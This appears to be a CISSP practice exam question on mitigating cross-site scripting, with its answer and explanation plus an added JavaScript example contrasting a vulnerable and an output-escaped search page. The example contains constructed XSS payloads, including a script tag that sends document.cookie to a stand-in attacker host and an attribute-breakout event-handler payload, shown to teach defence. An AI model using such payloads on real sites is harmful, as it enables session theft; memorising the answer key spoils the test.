Certified Information Systems Security Professional (CISSP) — Question 214
Which of the following methods is MOST effective in mitigating Cross-Site Scripting (XSS) vulnerabilities within HyperText Markup Language (HTML) websites?
Answer options
- A. Use antivirus and endpoint protection on the server to secure the web-based application
- B. Place the web-based system in a defined Demilitarized Zone (DMZ)
- C. Use .NET framework with .aspx extension to provide a higher level of security to the web application so that the web server display can be locked down
- D. Not returning any HTML tags to the browser client
Correct answer: D
Explanation
The correct answer is D. Cross-Site Scripting succeeds when data supplied by a client is written back into a page in a form the browser parses as markup, so an attacker's script tag or event-handler attribute executes in other users' sessions. If the application never returns user-controlled input to the browser as live HTML tags, that is, it encodes the input on output so that characters such as <, >, " and & arrive as literal text, there is nothing for the browser to execute and the injected script never runs. This addresses the root cause of the vulnerability rather than its surroundings. Option A (antivirus and endpoint protection on the server) inspects files and processes on the host, but an XSS payload executes in the victim's browser, not on the server. Option B (placing the system in a DMZ) limits the server's network exposure without changing how it handles input. Option C (using .NET and .aspx pages) is a platform choice; a framework may provide encoding helpers, but choosing it does not by itself guarantee that output is encoded, so it is not the most effective control among the options given.
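The following is an added example, not part of the exam page, showing what "not returning any HTML tags" supplied by the user looks like in practice. It renders the same search-results page twice: once reflecting the query verbatim (vulnerable), and once HTML-escaping every user-controlled value so the browser receives it as text. The page layout, the function names (escapeHtml, renderSearchVulnerable, renderSearchSafe, hasRawMarkupChars), the attacker host attacker.example and the payloads are all constructed for illustration.

```javascript
// Added example (not from the exam page). Two renderings of a search page:
// one reflects the user's query unchanged, the other HTML-escapes it so that
// no user-supplied tag or attribute breakout is ever returned to the browser.

// Characters that can change HTML structure, mapped to their entity forms.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Escape untrusted text for an HTML text node or a quoted attribute value.
// This is NOT sufficient inside <script>, inline event handlers or URL
// attributes; each of those contexts needs its own encoder.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query is interpolated raw into a text node and into an
// attribute value, so tags and quote characters are interpreted as markup.
function renderSearchVulnerable(query) {
  return [
    `<p>Results for: ${query}</p>`,
    `<input type="text" name="q" value="${query}">`,
  ].join("\n");
}

// Hardened: the identical page, but every interpolated user value is escaped
// on output, which is exactly "not returning any HTML tags" from the client.
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return [
    `<p>Results for: ${q}</p>`,
    `<input type="text" name="q" value="${q}">`,
  ].join("\n");
}

// Check suitable for a unit test: true when a string still contains anything
// the browser could read as markup (raw < > " ' or an ampersand that does not
// start one of the entities produced above).
function hasRawMarkupChars(s) {
  return /[<>"']/.test(s) || /&(?!(amp|lt|gt|quot|#x27);)/.test(s);
}

// Constructed payloads: one targets the text-node context, the other breaks
// out of the quoted attribute to add an event handler.
const BODY_PAYLOAD =
  "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)';

// Stand-alone demo: print both renderings for each payload.
for (const payload of [BODY_PAYLOAD, ATTR_PAYLOAD]) {
  console.log("--- vulnerable ---\n" + renderSearchVulnerable(payload));
  console.log("--- safe ---\n" + renderSearchSafe(payload));
}
```

The attribute payload matters because escaping only < and > is a common half-fix: without encoding the double quote, the value attribute is closed early and onfocus becomes a live attribute. In a real application, use the output-encoding functions your framework or template engine provides rather than hand-rolling one like escapeHtml above, and pick the encoder for the context you are writing into.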